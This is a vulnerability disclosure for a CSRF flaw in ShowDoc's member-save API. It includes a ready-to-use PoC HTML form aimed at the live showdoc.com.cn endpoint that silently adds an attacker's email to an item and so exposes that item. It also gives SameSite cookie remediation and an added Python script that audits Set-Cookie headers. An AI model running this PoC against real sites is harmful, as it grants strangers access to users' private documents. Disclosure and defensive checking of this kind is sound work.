With this CSRF vulnerability, an attacker is able to add any member to any item if a user visits the attacker's site.
1. Open PoC.html in Firefox or Safari.
2. Now you can check that the member with email address [email protected], which should already have been registered beforehand, has access to the item with id 1531601670203340.
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
<input type="hidden" name="item_id" value="1531601670203340" />
<input type="hidden" name="username" value="evil@mail.com" />
<input type="hidden" name="cat_id" value="0" />
<input type="hidden" name="member_group_id" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This vulnerability is capable of revealing any item.
Set the SameSite attribute of cookies to Lax or Strict.
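To confirm the fix is deployed, the check below audits Set-Cookie response headers for the SameSite attribute. It is an added example, not part of the original report or of ShowDoc's code; the cookie names and header values are constructed samples.

```python
# Added example: audit Set-Cookie headers for the SameSite fix described above.
# Cookie names and values are constructed samples, not captured from ShowDoc.

SAFE_VALUES = {"lax", "strict"}


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()  # attribute names are case-insensitive
    return name, attrs


def samesite_finding(header):
    """Return (cookie_name, verdict) for one Set-Cookie header value."""
    name, attrs = parse_set_cookie(header)
    if "samesite" not in attrs:
        # No attribute: the browser default applies, and not every browser defaults to Lax.
        return name, "missing"
    value = attrs["samesite"].lower()
    if value in SAFE_VALUES:
        return name, "ok"
    if value == "none":
        return name, "none"  # cookie is explicitly allowed on cross-site requests
    return name, "invalid"  # unrecognised value, handled like a missing attribute


def audit(headers):
    """Return names of cookies that may still be sent with a cross-site form POST."""
    return [name for name, verdict in map(samesite_finding, headers) if verdict != "ok"]


SAMPLE_HEADERS = [  # constructed input
    "session_id=abc123; Path=/; HttpOnly",
    "session_id=abc123; Path=/; HttpOnly; SameSite=Lax",
    "auth=xyz; Path=/; Secure; SameSite=None",
    "auth=xyz; Path=/; Secure; HttpOnly; samesite=strict",
]

if __name__ == "__main__":
    for h in SAMPLE_HEADERS:
        print(samesite_finding(h), "<-", h)
```

Any cookie name returned by `audit` for the authentication or session cookie means the state-changing endpoint is still reachable cross-site in browsers that do not apply Lax by default.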